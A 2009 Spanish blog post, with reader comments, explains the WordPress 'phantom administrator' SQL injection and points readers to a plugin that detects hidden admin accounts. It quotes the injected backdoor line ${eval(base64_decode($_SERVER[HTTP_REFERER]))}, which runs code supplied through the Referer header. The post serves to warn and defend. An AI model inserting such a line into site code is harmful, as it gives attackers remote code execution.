Solucion al problema del Administrador fantasma de Wordpress
Escrito en: Ayuda, Seguridad a día 6 Septiembre 2009
En estos últimos días está siendo explotado un problema que acarrea Wordpress durante unas cuantas versiones, se trata de una inyección SQL a la base de datos de nuestro Wordpress que permitirá la creación de un usuario con permisos de administrador. En muchos casos el problema se agravó con modificaciones en los permalinks al estado por defecto de Wordpress o la adicción del código ${eval(base64_decode ($_SERVER[HTTP_REFERER]))} convirtiendo en imposible la navegación dentro de la página web.
Detectar el administrador fantasma es muy simple ya que entrando al panel de administración de usuario veremos que hay más administradores de los que realmente tiene el blog, aunque no lo veamos en la lista, si veremos que hay más administradores que en el número que aparece al lado de administrador tendremos administradores fantasma.
Gracias a la gran comunidad que tiene este magnifico CMS ya disponemos de un plugin que lo soluciona, este plugin se encarga de comprobar que no existan administradores fantasma.
Etiquetas: Ayuda, Blog, Código, CMS, Comunidad, ISO, modifica, Página Web, Plugin, Seguridad, Web, Wordpress, Wordpress 2.8
Clic aquí para ayuda.
3 respuestas to “Solucion al problema del Administrador fantasma de Wordpress”
Deja una respuesta
Sígue a Linwind
Artículos relacionados
- Solución al los problemas de ping y trackbacks en Wordpress 2.9
- Activa la cuenta de administrador en Windows Vista
- Personalizar página de login de Wordpress
- WordPress 3.0 dice adiós a admin
- WordPress para iPhone 2.2
- Chuleta para crear un theme de WordPress
- Más themes gratis para Wordpress de calidad
- Cliente Wordpress para Android
- Instala un servidor y un CMS con Bitnami
- [Humor] Linux se queda colgado.
- Carga media alta (high load average) con Wordpress 2.8
- Wavr – Plugin de Wordpress para insertar Google Wave
[...] Solucion al problema del Administrador fantasma de Wordpress [...]
6 Septiembre 2009 a las 8:37 pmInformación Bitacoras.com…
Valora en Bitacoras.com: En estos últimos días está siendo explotado un problema que acarrea Wordpress durante unas cuantas versiones, se trata de una inyección SQL a la base de datos de nuestro Wordpress que permitirá la creación de un usuario con p…..
6 Septiembre 2009 a las 9:21 pmHola amigo. No sabes como te agradezco tu interes altruista y desinteresado al publicar un parche para este problema. Casualmente hace unos dias que me di cuenta de que tambien era victima de ese agujero de seguridad. Lamentablemente no fue suficiente para mi así que acá (http://sumolari.com/otra-solucion-al-administrador-fantasma-de-wordpress/) te dejo un link con una solucion que si me funcionó. Un abrazo
7 Septiembre 2009 a las 2:56 am